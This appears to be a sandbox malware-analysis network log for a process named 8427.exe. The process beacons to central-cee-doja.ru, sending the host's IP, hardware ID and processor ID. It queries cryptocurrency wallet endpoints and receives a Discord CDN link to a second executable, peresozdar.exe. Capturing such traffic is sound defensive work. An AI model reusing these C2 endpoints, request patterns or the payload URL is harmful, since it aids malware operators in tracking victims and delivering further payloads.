2023-11-18 09:02:37 UTC	767	IN	Data Raw: 6f 6c 75 6d 6e 4e 61 6d 65 3d 22 43 6f 6e 73 74 72 61 69 6e 74 54 79 70 65 22 20 56 61 6c 75 65 3d 22 50 52 49 4d 41 52 59 20 4b 45 59 22 2f 3e 0a 20 20 20 20 20 20 20 20 3c 2f 63 73 3a 4d 61 70 70 69 6e 67 46 72 61 67 6d 65 6e 74 3e 0a 20 20 20 20 20 20 3c 2f 63 73 3a 45 6e 74 69 74 79 54 79 70 65 4d 61 70 70 69 6e 67 3e 0a 20 20 20 20 20 20 3c 63 73 3a 45 6e 74 69 74 79 54 79 70 65 4d 61 70 70 69 6e 67 20 54 79 70 65 4e 61 6d 65 3d 22 53 74 6f 72 65 2e 46 6f 72 65 69 67 6e 4b 65 79 43 6f 6e 73 74 72 61 69 6e 74 22 20 3e 0a 20 20 20 20 20 20 20 20 3c 63 73 3a 4d 61 70 70 69 6e 67 46 72 61 67 6d 65 6e 74 20 53 74 6f 72 65 45 6e 74 69 74 79 53 65 74 3d 22 53 56 69 65 77 43 6f 6e 73 74 72 61 69 6e 74 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 63 73 3a 53 Data Ascii: olumnName="ConstraintType" Value="PRIMARY KEY"/> </cs:MappingFragment> </cs:EntityTypeMapping> <cs:EntityTypeMapping TypeName="Store.ForeignKeyConstraint" > <cs:MappingFragment StoreEntitySet="SViewConstraints"> <cs:S
2023-11-18 09:02:37 UTC	771	IN	Data Raw: 63 69 61 74 69 6f 6e 53 65 74 4d 61 70 70 69 6e 67 20 4e 61 6d 65 3d 22 56 69 65 77 56 69 65 77 43 6f 6e 73 74 72 61 69 6e 74 73 22 20 53 74 6f 72 65 45 6e 74 69 74 79 53 65 74 3d 22 53 56 69 65 77 43 6f 6e 73 74 72 61 69 6e 74 73 22 20 54 79 70 65 4e 61 6d 65 3d 22 53 74 6f 72 65 2e 54 61 62 6c 65 4f 72 56 69 65 77 43 6f 6e 73 74 72 61 69 6e 74 22 3e 0a 20 20 20 20 20 20 3c 63 73 3a 45 6e 64 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 3d 22 50 61 72 65 6e 74 22 3e 0a 20 20 20 20 20 20 20 20 3c 63 73 3a 53 63 61 6c 61 72 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 3d 22 49 64 22 20 43 6f 6c 75 6d 6e 4e 61 6d 65 3d 22 50 61 72 65 6e 74 49 64 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 63 73 3a 45 6e 64 50 72 6f 70 65 72 74 79 3e 0a 20 20 20 20 20 20 3c 63 73 3a 45 6e 64 Data Ascii: ciationSetMapping Name="ViewViewConstraints" StoreEntitySet="SViewConstraints" TypeName="Store.TableOrViewConstraint"> <cs:EndProperty Name="Parent"> <cs:ScalarProperty Name="Id" ColumnName="ParentId" /> </cs:EndProperty> <cs:End
2023-11-18 09:02:37 UTC	775	IN	Data Raw: 00 2e 00 64 00 61 00 74 00 61 00 2e 00 73 00 71 00 6c 00 69 00 74 00 65 00 2e 00 6f 00 72 00 67 00 2f 00 00 00 60 00 1c 00 01 00 46 00 69 00 6c 00 65 00 44 00 65 00 73 00 63 00 72 00 69 00 70 00 74 00 69 00 6f 00 6e 00 00 00 00 00 53 00 79 00 73 00 74 00 65 00 6d 00 2e 00 44 00 61 00 74 00 61 00 2e 00 53 00 51 00 4c 00 69 00 74 00 65 00 20 00 66 00 6f 00 72 00 20 00 4c 00 49 00 4e 00 51 00 00 00 34 00 0a 00 01 00 46 00 69 00 6c 00 65 00 56 00 65 00 72 00 73 00 69 00 6f 00 6e 00 00 00 00 00 31 00 2e 00 30 00 2e 00 31 00 31 00 35 00 2e 00 35 00 00 00 58 00 1c 00 01 00 49 00 6e 00 74 00 65 00 72 00 6e 00 61 00 6c 00 4e 00 61 00 6d 00 65 00 00 00 53 00 79 00 73 00 74 00 65 00 6d 00 2e 00 44 00 61 00 74 00 61 00 2e 00 53 00 51 00 4c 00 69 00 74 00 65 00 2e 00 Data Ascii: .data.sqlite.org/`FileDescriptionSystem.Data.SQLite for LINQ4FileVersion1.0.115.5XInternalNameSystem.Data.SQLite.
2023-11-18 09:02:37 UTC	779	IN	Data Raw: 10 06 03 55 04 05 13 09 33 36 34 36 31 37 2d 39 36 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 0f 30 0d 06 03 55 04 08 13 06 4f 72 65 67 6f 6e 31 12 30 10 06 03 55 04 07 13 09 42 65 61 76 65 72 74 6f 6e 31 2f 30 2d 06 03 55 04 0a 13 26 4d 69 73 74 61 63 68 6b 69 6e 20 53 79 73 74 65 6d 73 20 28 4a 6f 73 65 70 68 20 4d 69 73 74 61 63 68 6b 69 6e 29 31 2f 30 2d 06 03 55 04 03 13 26 4d 69 73 74 61 63 68 6b 69 6e 20 53 79 73 74 65 6d 73 20 28 4a 6f 73 65 70 68 20 4d 69 73 74 61 63 68 6b 69 6e 29 30 82 02 22 30 0d 06 09 2a 86 48 86 f7 0d 01 01 01 05 00 03 82 02 0f 00 30 82 02 0a 02 82 02 01 00 d5 70 b7 e5 f9 cf 1c 60 22 ec a9 c9 af 23 4d 14 c5 e4 58 c8 66 19 81 2a 3a a4 18 e9 70 32 d8 b2 03 63 30 f8 8b 47 ea d2 fe b6 0d c3 78 38 2b a6 17 b8 51 24 26 b0 8b 91 64 Data Ascii: U364617-9610UUS10UOregon10UBeaverton1/0-U&Mistachkin Systems (Joseph Mistachkin)1/0-U&Mistachkin Systems (Joseph Mistachkin)0"0H0p`"#MXf:p2c0Gx8+Q$&d
2023-11-18 09:02:37 UTC	783	IN	Data Raw: 31 19 30 17 06 03 55 04 0b 13 10 77 77 77 2e 64 69 67 69 63 65 72 74 2e 63 6f 6d 31 24 30 22 06 03 55 04 03 13 1b 44 69 67 69 43 65 72 74 20 41 73 73 75 72 65 64 20 49 44 20 52 6f 6f 74 20 43 41 30 1e 17 0d 31 36 30 31 30 37 31 32 30 30 30 30 5a 17 0d 33 31 30 31 30 37 31 32 30 30 30 30 5a 30 72 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 15 30 13 06 03 55 04 0a 13 0c 44 69 67 69 43 65 72 74 20 49 6e 63 31 19 30 17 06 03 55 04 0b 13 10 77 77 77 2e 64 69 67 69 63 65 72 74 2e 63 6f 6d 31 31 30 2f 06 03 55 04 03 13 28 44 69 67 69 43 65 72 74 20 53 48 41 32 20 41 73 73 75 72 65 64 20 49 44 20 54 69 6d 65 73 74 61 6d 70 69 6e 67 20 43 41 30 82 01 22 30 0d 06 09 2a 86 48 86 f7 0d 01 01 01 05 00 03 82 01 0f 00 30 82 01 0a 02 82 01 01 00 bd d0 32 ee 4b cd 8f 7f dd Data Ascii: 10Uwww.digicert.com1$0"UDigiCert Assured ID Root CA0160107120000Z310107120000Z0r10UUS10UDigiCert Inc10Uwww.digicert.com110/U(DigiCert SHA2 Assured ID Timestamping CA0"0*H02K
2023-11-18 09:02:37 UTC	787	IN	Data Raw: 61 63 68 6b 69 6e 29 30 82 02 22 30 0d 06 09 2a 86 48 86 f7 0d 01 01 01 05 00 03 82 02 0f 00 30 82 02 0a 02 82 02 01 00 d5 70 b7 e5 f9 cf 1c 60 22 ec a9 c9 af 23 4d 14 c5 e4 58 c8 66 19 81 2a 3a a4 18 e9 70 32 d8 b2 03 63 30 f8 8b 47 ea d2 fe b6 0d c3 78 38 2b a6 17 b8 51 24 26 b0 8b 91 64 ac bf 1d 8c 37 fd 4a ae a3 3f d6 de c7 0b 4f d3 76 df 3e 7c 07 06 48 8c 07 ad e9 40 eb c1 70 4f 83 80 5d 44 a0 95 e6 9c 40 0f 53 e9 d0 17 7d b2 8f bf c7 22 a1 c8 e2 9a 54 b9 67 f3 04 f8 ca d7 f6 de ea e2 56 a4 b0 33 59 a6 0d 48 2a c3 36 06 d7 85 05 1e e9 37 58 f7 36 67 ce 6e de ba 71 3e 43 99 3e 1b 9f d2 d5 71 e5 dc ca 09 5b 24 05 2a 4d 67 52 6b ec 71 0e 59 e4 e8 ba c5 a1 e1 95 8d 31 97 a4 41 6c 4a 80 8d 66 c2 92 e5 53 ed e4 95 0b 93 cf b8 d8 9c ee 91 ff 51 e7 0f 2b 3e Data Ascii: achkin)0"0H0p`"#MXf:p2c0Gx8+Q$&d7J?Ov>\|H@pO]D@S}"TgV3YH67X6gnq>C>q[$MgRkqY1AlJfSQ+>
2023-11-18 09:02:37 UTC	791	IN	Data Raw: 44 69 67 69 43 65 72 74 20 41 73 73 75 72 65 64 20 49 44 20 52 6f 6f 74 20 43 41 30 1e 17 0d 31 36 30 31 30 37 31 32 30 30 30 30 5a 17 0d 33 31 30 31 30 37 31 32 30 30 30 30 5a 30 72 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 15 30 13 06 03 55 04 0a 13 0c 44 69 67 69 43 65 72 74 20 49 6e 63 31 19 30 17 06 03 55 04 0b 13 10 77 77 77 2e 64 69 67 69 63 65 72 74 2e 63 6f 6d 31 31 30 2f 06 03 55 04 03 13 28 44 69 67 69 43 65 72 74 20 53 48 41 32 20 41 73 73 75 72 65 64 20 49 44 20 54 69 6d 65 73 74 61 6d 70 69 6e 67 20 43 41 30 82 01 22 30 0d 06 09 2a 86 48 86 f7 0d 01 01 01 05 00 03 82 01 0f 00 30 82 01 0a 02 82 01 01 00 bd d0 32 ee 4b cd 8f 7f dd a9 ba 82 99 c5 39 54 28 57 b6 23 4a c4 0e 07 45 33 51 10 7d d0 f9 7d 4d 68 7e e7 b6 a0 f4 8d b3 88 e4 97 bf 63 21 Data Ascii: DigiCert Assured ID Root CA0160107120000Z310107120000Z0r10UUS10UDigiCert Inc10Uwww.digicert.com110/U(DigiCert SHA2 Assured ID Timestamping CA0"0*H02K9T(W#JE3Q}}Mh~c!

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
50	192.168.2.4	49816	104.21.89.193	443	C:\Users\user\AppData\Local\Temp\8427.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-18 09:03:15 UTC	10683	OUT	GET /getwallet.php?id=1444&wallet=btc HTTP/1.1 Host: central-cee-doja.ru Connection: Keep-Alive
2023-11-18 09:03:16 UTC	10684	IN	HTTP/1.1 200 OK Date: Sat, 18 Nov 2023 09:03:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=GHXcjOfy8YGrMCLyydfb4Nw0DKlxftHBN3%2BdMQ%2Fk%2FZaULmtkwLn%2FELHy5tI2erkyAAyXDEw6ygjXLchdPcxiiCN%2FTrKfZ06ISRDLEFAZz%2FNAUa4XptANwDGb%2F9DoVVlVWS0sQl1N"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 827f0a0e0889c390-SEA alt-svc: h3=":443"; ma=86400
2023-11-18 09:03:16 UTC	10684	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
50	104.21.89.193	443	192.168.2.4	49816	C:\Users\user\AppData\Local\Temp\8427.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-18 09:03:15 UTC	10683	OUT	GET /getwallet.php?id=1444&wallet=btc HTTP/1.1 Host: central-cee-doja.ru Connection: Keep-Alive
2023-11-18 09:03:16 UTC	10684	IN	HTTP/1.1 200 OK Date: Sat, 18 Nov 2023 09:03:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=GHXcjOfy8YGrMCLyydfb4Nw0DKlxftHBN3%2BdMQ%2Fk%2FZaULmtkwLn%2FELHy5tI2erkyAAyXDEw6ygjXLchdPcxiiCN%2FTrKfZ06ISRDLEFAZz%2FNAUa4XptANwDGb%2F9DoVVlVWS0sQl1N"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 827f0a0e0889c390-SEA alt-svc: h3=":443"; ma=86400
2023-11-18 09:03:16 UTC	10684	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
51	192.168.2.4	49817	104.21.89.193	443	C:\Users\user\AppData\Local\Temp\8427.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-18 09:03:16 UTC	10683	OUT	GET /online.php?country=US&ipaddr=156.146.49.168&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=56F38B4617&ownerid=1444 HTTP/1.1 Host: central-cee-doja.ru Connection: Keep-Alive
2023-11-18 09:03:16 UTC	10685	IN	HTTP/1.1 200 OK Date: Sat, 18 Nov 2023 09:03:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=jZ3savaOLfFTNwZvWlABBSkUpkuS9Dx9deIL3v7f%2FPW8zbScLt5YZCkdqVLPA8J%2BVky7GFHnktYwXjYJ3HUBE5MzyXgXdFVVizl3VAfbX7CG80aDvDVPcaeo4aqsR0UT9BDzSG1Z"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 827f0a0f6d2bec6c-SEA alt-svc: h3=":443"; ma=86400
2023-11-18 09:03:16 UTC	10685	IN	Data Raw: 37 0d 0a 55 50 44 41 54 45 44 0d 0a Data Ascii: 7UPDATED
2023-11-18 09:03:16 UTC	10685	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
51	104.21.89.193	443	192.168.2.4	49817	C:\Users\user\AppData\Local\Temp\8427.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-18 09:03:16 UTC	10683	OUT	GET /online.php?country=US&ipaddr=156.146.49.168&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=56F38B4617&ownerid=1444 HTTP/1.1 Host: central-cee-doja.ru Connection: Keep-Alive
2023-11-18 09:03:16 UTC	10685	IN	HTTP/1.1 200 OK Date: Sat, 18 Nov 2023 09:03:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=jZ3savaOLfFTNwZvWlABBSkUpkuS9Dx9deIL3v7f%2FPW8zbScLt5YZCkdqVLPA8J%2BVky7GFHnktYwXjYJ3HUBE5MzyXgXdFVVizl3VAfbX7CG80aDvDVPcaeo4aqsR0UT9BDzSG1Z"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 827f0a0f6d2bec6c-SEA alt-svc: h3=":443"; ma=86400
2023-11-18 09:03:16 UTC	10685	IN	Data Raw: 37 0d 0a 55 50 44 41 54 45 44 0d 0a Data Ascii: 7UPDATED
2023-11-18 09:03:16 UTC	10685	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
52	104.21.89.193	443	192.168.2.4	49819	C:\Users\user\AppData\Local\Temp\8427.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-18 09:03:16 UTC	10685	OUT	GET /getwallet.php?id=1444&wallet=eth HTTP/1.1 Host: central-cee-doja.ru
2023-11-18 09:03:17 UTC	10686	IN	HTTP/1.1 200 OK Date: Sat, 18 Nov 2023 09:03:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=dz2XNnLP2KAH%2FMi9E5Ik4hIUediw1tcfTVKg7PhlEOHIJxU%2BQ7mo%2B88LGhXDGPHfvmenbTR2EIgUgP4CjOesadwRjPLXMFLjlDlMHyHnXFPyTiB7JNMKTCwPpwb4bmrQhN%2Fi%2BJGT"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 827f0a149c55089d-SEA alt-svc: h3=":443"; ma=86400
2023-11-18 09:03:17 UTC	10686	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
52	192.168.2.4	49819	104.21.89.193	443	C:\Users\user\AppData\Local\Temp\8427.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-18 09:03:16 UTC	10685	OUT	GET /getwallet.php?id=1444&wallet=eth HTTP/1.1 Host: central-cee-doja.ru
2023-11-18 09:03:17 UTC	10686	IN	HTTP/1.1 200 OK Date: Sat, 18 Nov 2023 09:03:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=dz2XNnLP2KAH%2FMi9E5Ik4hIUediw1tcfTVKg7PhlEOHIJxU%2BQ7mo%2B88LGhXDGPHfvmenbTR2EIgUgP4CjOesadwRjPLXMFLjlDlMHyHnXFPyTiB7JNMKTCwPpwb4bmrQhN%2Fi%2BJGT"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 827f0a149c55089d-SEA alt-svc: h3=":443"; ma=86400
2023-11-18 09:03:17 UTC	10686	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
53	192.168.2.4	49820	104.21.89.193	443	C:\Users\user\AppData\Local\Temp\8427.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-18 09:03:17 UTC	10685	OUT	GET //list.php?id=1444 HTTP/1.1 Host: central-cee-doja.ru
2023-11-18 09:03:17 UTC	10686	IN	HTTP/1.1 200 OK Date: Sat, 18 Nov 2023 09:03:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=c1%2BAbJos30v0IeKwlPqjMXoMQcWH5lBa%2Fb8ZDoEfUCpd9yNMrTnMDKKE%2BDKUZrDmppf1hpYIsI957aGMAxxwoiA3vVXXjhwoDjAhRPzPaPY3LvlTaWd7Oi5HPGkKvyoxHLitG1N9"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 827f0a153895ec88-SEA alt-svc: h3=":443"; ma=86400
2023-11-18 09:03:17 UTC	10687	IN	Data Raw: 36 64 0d 0a 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 64 69 73 63 6f 72 64 61 70 70 2e 63 6f 6d 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 31 36 35 30 35 31 36 33 39 30 34 30 38 34 33 38 31 39 2f 31 31 36 36 38 30 30 36 34 35 33 38 33 32 37 30 34 32 30 2f 70 65 72 65 73 6f 7a 64 61 72 2e 65 78 65 7c 34 36 32 37 38 38 33 0a 4e 4f 54 41 53 4b 53 0d 0a Data Ascii: 6dhttps://cdn.discordapp.com/attachments/1165051639040843819/1166800645383270420/peresozdar.exe\|4627883NOTASKS
2023-11-18 09:03:17 UTC	10687	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
53	104.21.89.193	443	192.168.2.4	49820	C:\Users\user\AppData\Local\Temp\8427.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-18 09:03:17 UTC	10685	OUT	GET //list.php?id=1444 HTTP/1.1 Host: central-cee-doja.ru
2023-11-18 09:03:17 UTC	10686	IN	HTTP/1.1 200 OK Date: Sat, 18 Nov 2023 09:03:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=c1%2BAbJos30v0IeKwlPqjMXoMQcWH5lBa%2Fb8ZDoEfUCpd9yNMrTnMDKKE%2BDKUZrDmppf1hpYIsI957aGMAxxwoiA3vVXXjhwoDjAhRPzPaPY3LvlTaWd7Oi5HPGkKvyoxHLitG1N9"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 827f0a153895ec88-SEA alt-svc: h3=":443"; ma=86400
2023-11-18 09:03:17 UTC	10687	IN	Data Raw: 36 64 0d 0a 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 64 69 73 63 6f 72 64 61 70 70 2e 63 6f 6d 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 31 36 35 30 35 31 36 33 39 30 34 30 38 34 33 38 31 39 2f 31 31 36 36 38 30 30 36 34 35 33 38 33 32 37 30 34 32 30 2f 70 65 72 65 73 6f 7a 64 61 72 2e 65 78 65 7c 34 36 32 37 38 38 33 0a 4e 4f 54 41 53 4b 53 0d 0a Data Ascii: 6dhttps://cdn.discordapp.com/attachments/1165051639040843819/1166800645383270420/peresozdar.exe\|4627883NOTASKS
2023-11-18 09:03:17 UTC	10687	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
54	192.168.2.4	49821	104.21.89.193	443	C:\Users\user\AppData\Local\Temp\8427.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-18 09:03:17 UTC	10685	OUT	GET //list.php?id=1444 HTTP/1.1 Host: central-cee-doja.ru
2023-11-18 09:03:17 UTC	10687	IN	HTTP/1.1 200 OK Date: Sat, 18 Nov 2023 09:03:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=F7TYmKKLrJyYHgitEXQiALSD%2BiY7FQYLed7RlMJBhMbVa%2FSr7OVcNFbrpBmw6GIWylm09AtBwpUwNiukgjY89m6Dqy4sbV3gyQ5jtldG6rZk50zUkJajPAEbkMn%2BDQlQo1X4nYZt"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 827f0a15ecddc4d9-SEA alt-svc: h3=":443"; ma=86400
2023-11-18 09:03:17 UTC	10687	IN	Data Raw: 36 64 0d 0a 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 64 69 73 63 6f 72 64 61 70 70 2e 63 6f 6d 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 31 36 35 30 35 31 36 33 39 30 34 30 38 34 33 38 31 39 2f 31 31 36 36 38 30 30 36 34 35 33 38 33 32 37 30 34 32 30 2f 70 65 72 65 73 6f 7a 64 61 72 2e 65 78 65 7c 34 36 32 37 38 38 33 0a 4e 4f 54 41 53 4b 53 0d 0a Data Ascii: 6dhttps://cdn.discordapp.com/attachments/1165051639040843819/1166800645383270420/peresozdar.exe\|4627883NOTASKS
2023-11-18 09:03:17 UTC	10687	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
54	104.21.89.193	443	192.168.2.4	49821	C:\Users\user\AppData\Local\Temp\8427.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-18 09:03:17 UTC	10685	OUT	GET //list.php?id=1444 HTTP/1.1 Host: central-cee-doja.ru
2023-11-18 09:03:17 UTC	10687	IN	HTTP/1.1 200 OK Date: Sat, 18 Nov 2023 09:03:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=F7TYmKKLrJyYHgitEXQiALSD%2BiY7FQYLed7RlMJBhMbVa%2FSr7OVcNFbrpBmw6GIWylm09AtBwpUwNiukgjY89m6Dqy4sbV3gyQ5jtldG6rZk50zUkJajPAEbkMn%2BDQlQo1X4nYZt"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 827f0a15ecddc4d9-SEA alt-svc: h3=":443"; ma=86400
2023-11-18 09:03:17 UTC	10687	IN	Data Raw: 36 64 0d 0a 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 64 69 73 63 6f 72 64 61 70 70 2e 63 6f 6d 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 31 36 35 30 35 31 36 33 39 30 34 30 38 34 33 38 31 39 2f 31 31 36 36 38 30 30 36 34 35 33 38 33 32 37 30 34 32 30 2f 70 65 72 65 73 6f 7a 64 61 72 2e 65 78 65 7c 34 36 32 37 38 38 33 0a 4e 4f 54 41 53 4b 53 0d 0a Data Ascii: 6dhttps://cdn.discordapp.com/attachments/1165051639040843819/1166800645383270420/peresozdar.exe\|4627883NOTASKS
2023-11-18 09:03:17 UTC	10687	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
55	192.168.2.4	49823	104.21.89.193	443	C:\Users\user\AppData\Local\Temp\8427.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-18 09:03:18 UTC	10687	OUT	GET /getwallet.php?id=1444&wallet=xmr HTTP/1.1 Host: central-cee-doja.ru
2023-11-18 09:03:18 UTC	10688	IN	HTTP/1.1 200 OK Date: Sat, 18 Nov 2023 09:03:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=bvhjZfTZ%2FTFwPet80c9%2FrIK4%2FpDbx1Yrlp2WP7hi%2F8RZZt%2B%2BjEgXJWTfWHQqo7ZOokdNHleMB87BPhJWHQ1btohxMGhu2jSB%2FRjA3UzUE7ZQhiYgpRu4aeg%2B665sTgkKGocjfD6m"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 827f0a1b2da32769-SEA alt-svc: h3=":443"; ma=86400
2023-11-18 09:03:18 UTC	10688	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
55	104.21.89.193	443	192.168.2.4	49823	C:\Users\user\AppData\Local\Temp\8427.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-18 09:03:18 UTC	10687	OUT	GET /getwallet.php?id=1444&wallet=xmr HTTP/1.1 Host: central-cee-doja.ru
2023-11-18 09:03:18 UTC	10688	IN	HTTP/1.1 200 OK Date: Sat, 18 Nov 2023 09:03:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=bvhjZfTZ%2FTFwPet80c9%2FrIK4%2FpDbx1Yrlp2WP7hi%2F8RZZt%2B%2BjEgXJWTfWHQqo7ZOokdNHleMB87BPhJWHQ1btohxMGhu2jSB%2FRjA3UzUE7ZQhiYgpRu4aeg%2B665sTgkKGocjfD6m"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 827f0a1b2da32769-SEA alt-svc: h3=":443"; ma=86400
2023-11-18 09:03:18 UTC	10688	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
56	104.21.89.193	443	192.168.2.4	49824	C:\Users\user\AppData\Local\Temp\8427.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-18 09:03:18 UTC	10688	OUT	GET /online.php?country=US&ipaddr=156.146.49.168&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=56F38B4617&ownerid=1444 HTTP/1.1 Host: central-cee-doja.ru
2023-11-18 09:03:19 UTC	10688	IN	HTTP/1.1 200 OK Date: Sat, 18 Nov 2023 09:03:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=0r97%2BB%2F1NAGPb1QXvOc2zKhn67029mMHEn8%2Bu7cq7TU9e49A2clSUFEk68C7Q5wGATRVnvTM%2F2%2F0LEG8dCy%2B%2BsK0KJ0jLxxHURj2A5pJnYdNDj3b12J%2FbNp%2FdkaGdVRTl8%2BYNFME"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 827f0a1cbf10680f-SEA alt-svc: h3=":443"; ma=86400
2023-11-18 09:03:19 UTC	10689	IN	Data Raw: 37 0d 0a 55 50 44 41 54 45 44 0d 0a Data Ascii: 7UPDATED
2023-11-18 09:03:19 UTC	10689	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
56	192.168.2.4	49824	104.21.89.193	443	C:\Users\user\AppData\Local\Temp\8427.exe

